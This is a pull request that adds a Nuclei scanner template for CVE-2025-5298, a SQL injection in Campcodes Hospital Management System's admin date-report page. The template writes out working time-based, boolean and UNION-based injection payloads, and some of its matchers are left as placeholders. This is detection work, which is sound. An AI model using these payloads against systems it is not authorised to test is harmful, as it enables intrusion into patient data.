### PR TITLE
Create CVE-2025-5298.yaml

### DIFF
--- a/http/cves/2025/CVE-2025-5298.yaml
+++ b/http/cves/2025/CVE-2025-5298.yaml
@@ -1,0 +1,66 @@
+id: campcodes-hms-sqli
+
+info:
+  name: Campcodes Hospital Management System v1.0 - SQL Injection
+  author: vijay-sutar
+  severity: critical
+  description: |
+    Campcodes Hospital Management System v1.0 is vulnerable to SQL Injection via the `fromdate` and `todate` fields in `/admin/betweendates-detailsreports.php`.
+    - Time-based (fromdate)
+    - Boolean-based and UNION-based (todate)
+  reference:
+    - https://www.campcodes.com/projects/online-hospital-management-system-using-php-and-mysql/
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-5298
+  classification:
+    cve-id: CVE-2025-5298
+    cwe-id: CWE-89
+  tags: campcodes,sqli,hospital,cve2025
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/admin/betweendates-detailsreports.php"
+
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+
+    body: fromdate=2019-01-01' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- &todate=2025-05-28&submit=
+
+    matchers:
+      - type: dsl
+        name: time-based
+        dsl:
+          - duration>=5
+          - status==200
+
+  - method: POST
+    path:
+      - "{{BaseURL}}/admin/betweendates-detailsreports.php"
+
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+
+    body: fromdate=2019-01-01&todate=2025-05-28' AND 1=1-- &submit=
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Report"  # Adjust to match a known string from a valid response
+      - type: status
+        status:
+          - 200
+
+  - method: POST
+    path:
+      - "{{BaseURL}}/admin/betweendates-detailsreports.php"
+
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+
+    body: fromdate=2019-01-01&todate=2025-05-28' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,version()-- -&submit=
+
+    matchers:
+      - type: word
+        words:
+          - "MySQL"  # Or adjust based on DB banner output


### PR DESCRIPTION
### Template / PR Information


- CVE: CVE-2025-5298
- Affected: Campcodes Hospital Management System v1.0
- Vuln: SQL Injection via `fromdate` and `todate` in `betweendates-detailsreports.php`
- Exploit type: Time-based blind + Boolean-based + UNION-based SQLi
- Safe payloads used.
- Validated with `nuclei -validate`.

- References:
- https://www.campcodes.com/projects/online-hospital-management-system-using-php-and-mysql/


### Template Validation

I've validated this template locally?
 YES


